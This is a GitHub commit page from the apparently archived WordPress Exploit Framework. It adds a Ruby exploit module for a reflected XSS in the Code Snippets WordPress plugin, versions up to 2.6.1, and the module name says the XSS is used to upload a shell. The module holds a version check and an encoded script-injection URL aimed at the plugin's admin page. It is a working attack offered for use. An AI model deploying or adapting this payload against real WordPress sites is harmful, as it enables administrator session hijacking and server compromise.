Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 6769574

Browse files
rastatingrastating
committed
Add Code Snippets reflected XSS module
1 parent 0cb7509 commit 6769574

File tree

1 file changed

+32
-0
lines changed

1 file changed

+32
-0
lines changed

modules/exploits/code_snippets_reflected_xss_shell_upload.rb

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
class Wpxf::Exploit::CodeSnippetsReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::ReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Code Snippets <= 2.6.1 Reflected XSS Shell Upload',
9+
author: [
10+
'Burak Kelebek', # Discovery
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8566'],
15+
['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_code_snippets_wordpress_plugin.html']
16+
],
17+
date: 'Jul 24 2016'
18+
)
19+
end
20+
21+
def check
22+
check_plugin_version_from_readme('code-snippets', '2.7')
23+
end
24+
25+
def vulnerable_url
26+
normalize_uri(wordpress_url_admin, 'admin.php')
27+
end
28+
29+
def url_with_xss
30+
"#{vulnerable_url}?page=snippets&tag=%5C%5C%27%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E"
31+
end
32+
end

0 commit comments

Comments
 (0)